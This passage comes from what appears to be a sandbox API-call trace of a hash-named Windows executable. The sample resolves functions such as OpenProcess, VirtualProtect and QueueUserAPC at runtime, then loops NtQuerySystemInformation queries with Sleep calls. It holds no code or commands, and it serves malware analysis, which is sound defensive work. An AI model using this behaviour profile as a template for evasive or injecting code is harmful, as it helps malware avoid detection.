returned 0x77150e70 [0141.692] GetProcAddress (hModule=0x77130000, lpProcName="OpenProcess") returned 0x77150590 [0141.692] GetProcAddress (hModule=0x77130000, lpProcName="CreateEventA") returned 0x77152e90 [0141.692] GetProcAddress (hModule=0x77130000, lpProcName="GetLongPathNameW") returned 0x7714e1c0 [0141.692] GetProcAddress (hModule=0x77130000, lpProcName="GetVersion") returned 0x771518d0 [0141.692] GetProcAddress (hModule=0x77130000, lpProcName="GetCurrentProcessId") returned 0x77152df0 [0141.692] GetProcAddress (hModule=0x77130000, lpProcName="GetProcAddress") returned 0x7714f4b0 [0141.692] GetProcAddress (hModule=0x77130000, lpProcName="LoadLibraryA") returned 0x77150b30 [0141.692] GetProcAddress (hModule=0x77130000, lpProcName="VirtualProtect") returned 0x77150420 [0141.693] GetProcAddress (hModule=0x77130000, lpProcName="MapViewOfFile") returned 0x7714f4f0 [0141.693] GetProcAddress (hModule=0x77130000, lpProcName="GetSystemTimeAsFileTime") returned 0x7714f2f0 [0141.693] GetProcAddress (hModule=0x77130000, lpProcName="CreateFileMappingW") returned 0x77150400 [0141.693] GetProcAddress (hModule=0x77130000, lpProcName="QueueUserAPC") returned 0x771496f0 [0141.693] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76390000 [0143.448] GetProcAddress (hModule=0x76390000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 0x763b3be0 [0143.448] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x6fc80000 [0144.217] GetProcAddress (hModule=0x6fc80000, lpProcName="atexit") returned 0x6fc9c544 [0144.218] atexit (param_1=0x4b0920) returned 0 [0144.218] HeapCreate (flOptions=0x0, dwInitialSize=0x400000, dwMaximumSize=0x0) returned 0x2560000 [0144.371] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0144.371] GetCommandLineW () returned="\"C:\\Users\\OqXZRaykm\\Desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe\" " [0144.371] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x114 [0144.371] GetVersion () returned 0x23f00206 [0144.371] GetCurrentProcessId () returned 0x1604 [0144.371] OpenProcess (dwDesiredAccess=0x10047a, bInheritHandle=0, dwProcessId=0x1604) returned 0x118 [0144.371] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0144.371] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0144.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0144.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0144.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0144.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0144.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0144.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0144.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0144.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0144.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0144.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0144.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0144.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0144.500] Sleep (dwMilliseconds=0x110) [0144.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0144.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0144.901] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0144.902] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0144.903] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0144.903] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0144.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0144.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0144.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0144.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0144.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0144.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0144.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0144.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0144.907] Sleep (dwMilliseconds=0x110) [0145.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0145.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0145.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0145.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0145.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0145.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0145.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0145.381] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0145.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0145.382] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0145.382] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0145.383] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0145.383] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0145.384] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0145.384] Sleep (dwMilliseconds=0x110) [0145.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0145.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0145.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0145.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0145.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0145.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0145.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0145.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0145.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0145.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0145.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0145.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0145.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0145.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0145.708] Sleep (dwMilliseconds=0x110) [0146.009] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0146.009] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0146.010] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.011] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0146.011] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0146.012] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.012] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0146.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0146.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0146.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0146.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0146.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.015] Sleep (dwMilliseconds=0x110) [0146.396] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0146.396] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0146.397] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.398] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0146.398] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0146.399] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.399] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0146.399] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0146.400] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.400] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0146.400] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0146.401] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0146.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.405] Sleep (dwMilliseconds=0x110) [0146.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0146.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0146.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0146.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0146.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0146.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0146.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0146.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0146.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0146.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0146.736] Sleep (dwMilliseconds=0x110) [0147.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0147.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0147.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0147.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0147.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0147.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0147.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0147.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0147.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0147.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0147.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0147.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0147.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0147.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0147.378] Sleep (dwMilliseconds=0x110) [0147.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0147.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0147.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0147.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0147.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0147.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0147.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0147.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0147.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0147.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0147.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0147.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0147.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0147.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0147.862] Sleep (dwMilliseconds=0x110) [0148.382] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0148.382] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0148.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0148.383] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0148.383] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0148.384] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0148.384] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0148.384] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0148.385] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0148.385] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0148.385] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0148.386] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0148.386] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0148.387] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0148.387] Sleep (dwMilliseconds=0x110) [0148.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0148.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0148.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0148.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0148.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0148.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0148.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0148.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0148.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0148.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0148.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0148.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0148.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0148.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0148.738] Sleep (dwMilliseconds=0x110) [0149.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0149.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0149.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0149.115] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0149.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.116] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0149.116] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0149.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.117] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0149.117] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0149.118] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.118] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0149.119] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.119] Sleep (dwMilliseconds=0x110) [0149.449] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0149.449] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0149.450] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.450] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0149.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0149.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0149.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0149.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0149.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 